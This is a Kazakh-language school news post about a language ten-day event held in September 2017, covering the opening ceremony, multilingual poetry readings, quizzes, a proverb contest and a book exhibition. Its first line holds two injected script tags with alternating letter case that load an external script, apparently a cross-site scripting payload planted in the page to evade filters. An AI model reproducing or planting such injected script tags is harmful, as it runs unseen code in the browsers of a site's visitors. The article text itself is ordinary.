<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.10.2017

"Қазақстан Республикасында тілдерді дамыту  мен қолданудың 2011-2020 жылдарға

арналған" мемлекеттік бағдарламасын жүзеге асыру мақсатында бекітілген

жоспарға  байланысты  қыркүйек  айының  09—18  аралығында тіл онкүндігіне  арналғаніс-шаралар өткізілді.

09 қыркүйекте  тіл апталығының ашылу салтанаты болды. Пән мұғалімдері Амириева Р.Ж. , Жирентаева А.Д.және

Нурмуханова А.М. оқушыларды тіл апталығының салтанатты ашылуымен құттықтап,өтілетін

іс-шаралардың жоспарымен таныстырды.  

Жоғары сынып  оқушылары "Әр тіл-өзіне ардақты" деген тақырыпта  қазақ , орыс ,ағылшын тілінде  өлең , жырларды мәнерлеп оқыды.

"Қазақстан –көп  ұлтты мемлекет"  тақырыбында сынып жетекшілері сынып  сағаттарын өткізді.

Жоғары сыныптарда "Білгірлер сайысы" өтті.

Мемлекеттік тілдің мәдениетін көтеру, әдебиетті насихаттау , талантты

жастарды  іздеп табу  мақсатында  және өз елін жерін. Отаннын

,туған халқының  тілі мен салт- дәстүрін  қастерлейтін саналы да парасатты

азамат тәрбиелеу  әр ұстаздың міндеті қазіргі таңда . Сондықтан қазақ тілі

пәніне қызығушылықтарын ояту үшін   төменгі  сыныптарда   "Мың бір

мақал,жүз бір жұмбақ" атты сайысын өткізіп, оқушылар  өздерінің білімдерін көрсетті.                              

Жарыс қызықты , тартымды өтті.

Кітапханашы Амангелдинова "Тіл- әр халықтың байлығы"тақырыбында кітап көрмесін ұйымдастырды.

Апталықта ұстаздар жаңашыл    интерактивтік тақтамен ,  безендіру,  музыкамен әрлендірулермен

толықтырып оқушылардың қызығушылын оята алды. Апталық салтанатты  марапаттаумен аяқталды.

 

 

 

Просмотров: 1093


Пікір қосу



Деректерді қолтаңбаға қосу